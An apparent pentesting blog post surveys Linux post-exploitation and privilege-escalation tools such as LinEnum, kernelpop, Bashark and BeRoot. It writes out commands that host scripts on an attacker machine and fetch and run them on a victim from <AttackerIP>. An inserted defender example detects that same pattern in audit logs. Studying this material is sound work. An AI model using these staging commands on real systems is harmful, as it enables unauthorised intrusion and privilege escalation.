Linux Automated Scripts

Introduction

In this blog post, we will discuss some tools that automate the post-exploitation process and save us time and effort.

Post Enumeration Scripts

LinEnum.sh

https://github.com/rebootuser/LinEnum/blob/master/LinEnum.sh

This script performs local Linux post-exploitation enumeration and privilege escalation checks.

How to use?

You need to download it to the target machine using wget or curl.

You can use Python, PHP, Ruby, or nc to start a static HTTP web server.

Python

python -m SimpleHTTPServer 8080

python3 -m http.server 80

PHP

php -S 0.0.0.0:80

Ruby

ruby -run -ehttpd . -p80

Netcat

while true ; do nc -l 80 < LinEnum.sh ; done

Downloading using curl and wget

curl

curl -o LinEnum.sh http://<AttackerIP>/LinEnum.sh

wget

wget http://<AttackerIP>/LinEnum.sh

chmod +x LinEnum.sh

./LinEnum.sh

It will automate the post-enumeration process and report the valuable results.
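From the defender's side, the fetch, chmod +x, run sequence above (repeated for the other scripts on this page) leaves a recognisable trail in process-execution logs. The following Python is an added example, not part of the original post or of LinEnum: it correlates auditd EXECVE records and reports files that were downloaded with wget or curl, made executable, and run within a time window. The log lines are constructed, and the 300-second window and function names are assumptions.

```python
import re
from os.path import basename
# Constructed auditd EXECVE records (not from a real host); 192.0.2.x is a documentation range.
SAMPLE_LOG = """\
type=EXECVE msg=audit(1700000000.100:301): argc=2 a0="wget" a1="http://192.0.2.10/LinEnum.sh"
type=EXECVE msg=audit(1700000004.200:302): argc=3 a0="chmod" a1="+x" a2="LinEnum.sh"
type=EXECVE msg=audit(1700000006.300:303): argc=2 a0="/bin/bash" a1="./LinEnum.sh"
type=EXECVE msg=audit(1700000050.000:304): argc=4 a0="curl" a1="-o" a2="report.pdf" a3="https://192.0.2.20/report.pdf"
type=EXECVE msg=audit(1700009001.000:306): argc=1 a0="./backup.sh"
"""

REC = re.compile(r'type=EXECVE msg=audit\((\d+)\.\d+:(\d+)\):(.*)')
ARG = re.compile(r'a\d+="([^"]*)"')   # hex-encoded arguments are not decoded here
EXEC_MODE = re.compile(r'[ugoa]*[+=][rwxXst]*x[rwxXst]*|[0-7]*[1357][0-7]*')
OUT_FLAGS = {"wget": ("-O", "--output-document"), "curl": ("-o", "--output")}

def parse(log):  # yields (epoch_seconds, event_id, argv) for each EXECVE record
    for m in map(REC.match, log.splitlines()):
        if m and ARG.search(m.group(3)):
            yield int(m.group(1)), int(m.group(2)), ARG.findall(m.group(3))

def fetched_name(argv):
    """Local file name a wget/curl call most likely writes, else None."""
    tool = basename(argv[0])
    if tool not in OUT_FLAGS:
        return None
    for i, arg in enumerate(argv[1:-1], start=1):
        if arg in OUT_FLAGS[tool]:
            return basename(argv[i + 1])
    urls = [a for a in argv[1:] if "://" in a]
    return basename(urls[-1].split("?")[0]) if urls else None   # heuristic: URL basename

def detect(log, window=300):
    """Return (file, fetch_event, exec_event) for fetch -> chmod +x -> run within window."""
    fetched, hits = {}, []            # file -> [fetch_time, fetch_event, chmod_seen]
    for ts, event, argv in parse(log):
        if (name := fetched_name(argv)):
            fetched[name] = [ts, event, False]
            continue
        for name in {basename(a) for a in argv} & fetched.keys():
            entry = fetched[name]
            if ts - entry[0] > window:
                del fetched[name]                      # too old to correlate
            elif basename(argv[0]) == "chmod":
                entry[2] |= any(EXEC_MODE.fullmatch(a) for a in argv[1:])
            elif entry[2]:
                hits.append((name, entry[1], event))   # downloaded file was executed
                del fetched[name]
    return hits
```

Scripts passed straight to an interpreter without chmod (for example python3 file.py) are outside this rule and need a separate fetch-then-interpret check.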

Pspy

This tool monitors Linux processes without root permissions.

Download its binary to your attacker system, start the local server as before, and download it to the victim's machine.

After downloading, execute it and it will perform the monitoring for you.

Linux Exploit Suggester

https://github.com/InteliSecureLabs/Linux_Exploit_Suggester

Linux_Exploit_Suggester suggests exploits based on operating system release number, which helps the attacker to exploit the target.

Searchsploit

We have discussed this tool in previous phases; it can also help us check for a particular exploit for the target.

Kernelpop

https://github.com/spencerdodd/kernelpop

Kernel privilege escalation enumeration and exploitation framework.

Download it from the link above.

$ cd kernelpop
$ python3 kernelpop.py

It will automate kernel vulnerability enumeration and exploitation.

Bashark

Bashark aids pen-testers and security researchers during the post-exploitation phase of security audits.

Usage

To launch Bashark on a compromised host, simply source the bashark.sh script from the terminal:

$ source bashark.sh

Then type help to see Bashark's help menu.

Features

  • Single Bash script
  • Lightweight and fast
  • Multi-platform: Unix, OSX, Solaris, etc.
  • No external dependencies
  • Immune to heuristic and behavioral analysis
  • Built-in aliases of often used shell commands
  • Extends system shell with post-exploitation oriented functionalities
  • Stealthy, with custom cleanup routine activated on exit
  • Easily extensible (add new commands by creating Bash functions)
  • Full tab completion

wget https://raw.githubusercontent.com/TheSecondSun/Bashark/master/bashark.sh

Then simply run it:

chmod +x bashark.sh

./bashark.sh

Linuxprivchecker

Enumerates system configuration and checks for privilege escalation.

wget https://www.securitysift.com/download/linuxprivchecker.py

python3 linuxprivchecker.py

linux-exploit-suggester-2

Linux_Exploit_Suggester-2 is the extended version of the previous Linux_Exploit_Suggester, used to find Linux privilege escalation vulnerabilities in a system.

git clone https://github.com/jondonas/linux-exploit-suggester-2.git

cd linux-exploit-suggester-2

./linux-exploit-suggester-2.pl

BeRoot

Privilege Escalation Project - Windows / Linux / Mac

BeRoot Project is a post-exploitation tool to check common misconfigurations to find a way to escalate our privilege. It has been added to the pupy project as a post-exploitation module (so it will be executed in memory without touching the disk).

For now, we are using it for Linux.

Features of BeRoot:

  • Check Files Permissions
  • SUID bin
  • NFS root Squashing
  • Docker
  • Sudo rules
  • Kernel Exploit

wget https://raw.githubusercontent.com/AlessandroZ/BeRoot/master/Linux/beroot.py

chmod +x beroot.py

./beroot.py

Conclusion

We have discussed some automated scripts which can help us during post-exploitation. I suggest trying them on your own system to learn how they work.